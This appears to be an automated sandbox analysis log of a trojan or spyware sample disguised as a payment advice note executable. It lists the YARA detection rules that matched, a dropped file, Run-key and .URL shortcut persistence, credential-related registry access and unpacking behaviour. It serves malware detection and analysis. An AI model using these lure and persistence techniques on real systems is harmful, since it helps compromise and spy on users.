                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeSection loaded: mscorjit.dllJump to behavior
                    Source: 00000005.00000002.783743346.0000000002C67000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: 00000005.00000002.783743346.0000000002C67000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                    Source: 00000001.00000002.697786352.0000000002E07000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: 00000001.00000002.697786352.0000000002E07000.00000020.00000001.sdmp, type: MEMORYMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\pdwO.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\pdwO.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\pdwO.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@8/6
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCommand line argument: 08A11_2_00413780
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEVirustotal: Detection: 26%
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEReversingLabs: Detection: 16%
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile read: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE 'C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE'
                    Source: unknownProcess created: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess created: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEStatic file information: File size 1346928 > 1048576
                    Source: Binary string: _.pdb source: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000003.698959513.0000000000708000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.932033702.00000000021F4000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeUnpacked PE file: 11.2.Owdpdrv.exe.400000.0.unpack .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeUnpacked PE file: 11.2.Owdpdrv.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00423149 push eax; ret 2_2_00423179
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_004231C8 push eax; ret 2_2_00423179
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXECode function: 2_2_00485E8F push edi; retn 0000h2_2_00485E91
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041C40C push cs; iretd 11_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_00423149 push eax; ret 11_2_00423179
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041C50E push cs; iretd 11_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_004231C8 push eax; ret 11_2_00423179
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0040E21D push ecx; ret 11_2_0040E230
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_0041C6BE push ebx; ret 11_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeCode function: 11_2_04F765C3 push eax; ret 11_2_04F765CD
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXERegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OwdpJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXERegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OwdpJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXERegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
